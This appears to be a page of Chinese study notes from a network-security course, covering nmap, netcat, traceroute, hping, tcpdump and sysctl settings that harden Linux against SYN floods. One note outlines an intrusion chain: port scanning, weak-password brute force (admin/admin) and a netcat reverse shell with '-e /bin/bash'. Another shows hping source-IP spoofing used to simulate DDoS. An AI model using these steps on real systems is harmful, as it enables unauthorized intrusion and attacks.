-
fping参数
查看全部 -
源码包编译过程查看全部
-
主机扫描命令
查看全部 -
网络安全技术手段查看全部
-
网络安全技术定义
查看全部 -
1.网络入侵方式
踩点,网络扫描,查点,提权等查看全部 -
tracert命令tracert www.jd.com 查ip地址
nmap命批量主机服务扫描令,得知某个路由里面的端口
尝试进行暴力破解,发现登陆内网http://10.202.4.73,是否能用弱口令进行登陆,例如:admin/admin
登陆到管理界面后,尝试用nc命令进行交互式shell操作,例如nc -10.68.104.6 2005 -e/bin/bash监听黑客的2005接口,并将目标机器的所有bash命令
查看全部 -
SYN类型DDOS攻击:服务器接收到连接请求(syn=j),将此信息加入backlog未连接队列,导致队列满了丢弃掉正常的SYN请求,同时发送请求包给客户(syn=k,ack=j+1),进入SYN_RECV状态。当未收到客户端的确认包时,一直重发请求包,占用网络带宽,引起网络堵塞甚至系统瘫痪。
减少syn和ack包的重试次数
sysctl -w net.ipv4.tcp_synack_retries=3
sysctl -w net.ipv4.tcp_syn_retries=3
SYN cookies技术
sysctl -w net.ipv4.tcp_syncookies=1
增加backlog队列
sysctl -w net.ipv4.tcp_max_syn_backlog=2048
关闭ICMP协议请求
sysctl -w net.ipv4.icmp_echo_ignore_all=1
查看全部 -
netcat(nc)工具:在centos中通过yum search nc查找,然后安装。 nc -z -v -n -w2 172.31.100.7 21-25 可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为UDP。 z 参数在连接成功后立即关闭连接,不进行数据交换;v 参数指详细输出;n 参数表示不要使用DNS反向查询IP地址的域名。 这个命令会打印21到25所有开放的端口并且打印运行在这个端口上服务的banner信息。Banner是一个文本,是一个你连接的服务发送给你的文本信息。但是,并不是所有的服务都会发送banner。
查看全部 -
1、nmap -sP IP/24 查看这一段IP内哪个主机的开放的 ICMP协议类型 ping扫描 2、nmap -sS [-p 端口范围] IP 查看IP开发的TCP端口 TCP SYN扫描 tcp半开放扫描(没有建立三次握手)(不会被服务检测,例如Apache等) 默认扫描0-1024端口及一些常用端口 3、nmap -sT [-p 端口范围] IP TCP connect()扫描 TCP全开放扫描 4、nmap -sU IP UDP扫描 UDP协议扫描 有效透过防火墙策略
查看全部 -
nmap -sP(ping扫描主机是否存活) x.x.x.0/24 <nmap -sP 61.135.169.0/24>
nmap -sS(TCP半开放扫描) -p(指定端口扫描范围) [端口1]-[端口2] [目标IP] <nmap -sS -p 0-30000 192.168.5.7>
nmap -sT(TCP全开放扫描) -p(指定端口扫描范围) [端口1]-[端口2] [目标IP] <nmap -sT -p 0-30000 192.168.5.7>
nmap -sU(UDP扫描) -p(指定端口扫描范围) [端口1]-[端口2] [目标IP] <nmap -sU -p 0-30000 192.168.5.7>
tcp半开放扫描:发送SYN包但不建立第三次握手,不被目标服务发现 tcp全开放扫描:进行三次握手,建立tcp连接
查看全部 -
原理与traceroute一致,mtr另外可以看丢包率
查看全部 -
路由扫描:查询本机到另一个主机经过的路由跳数及数据延迟情况。 tracerpute原理:traceroute 送出一个TTL(生存时间)是1的UDP数据包(每次送的的是3个40字节的包,包括源地址,目的地址和包发出的时间标签)到目的地,当路径上的第一个路由器收到这个数据包时,它将TTL减1变为0,并送回一个ICMP数据包,表示UDP数据包已经执行;接着再送出另一个TTL为2的数据包,发现第二个路由器,然后一直重复执行该操作,直到某个数据包抵达目的地;因为它所选择送达的port number(30000以上)是一般应用程序都不会用的端口,所以在traceroute送出UDP数据包到目的地时,该目的主机会送回一个目的地址不可达的消息
查看全部 -
hping 一 对制定端口发起TCP探测 二 伪造来源IP,模拟Ddos攻击
Linux查看端口 netstat -l(监听)t(TCP)n(不显示主机名) <netstat -ltn>
Windows查看端口 netstat -ano
hping -p [端口] -S(发送SYN包) [目标IP]
-a(伪造发送IP) [伪造IP] <hping -p 22 -S 192.168.3.26 -a 192.168.3.27>
修改Linux内核禁用ICMP报文 sysctl -w net.ipv4.icmp_echo_ignore_all=1
查看经过某网络设备包信息 tcpdump -n(不把主机IP转换为名称) -p(不让网络界面进入混杂模式) -i[网卡名称] src host(只显示此IP包信息) [目标IP] <tcpdump -np -ieth1 src host 192.168.3.56>
查看全部 -
hping安装依赖了libpcap和libpcap-devel。 make出现错误:net/bpf.h:没有那个文件或目录,未发现bpf-h,解决办法:ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h;/usr/bin/ld:cannot find -ltcl,解决办法:yum install tcl-devel;创建符号链接 "/usr/sbin/hping"文件已存在,解决办法:使用 rm -rf /usr/sbin/hping* 删除。 make install之后,出现Can't install the man page: /usr/local/man/man8 does not exis
查看全部
举报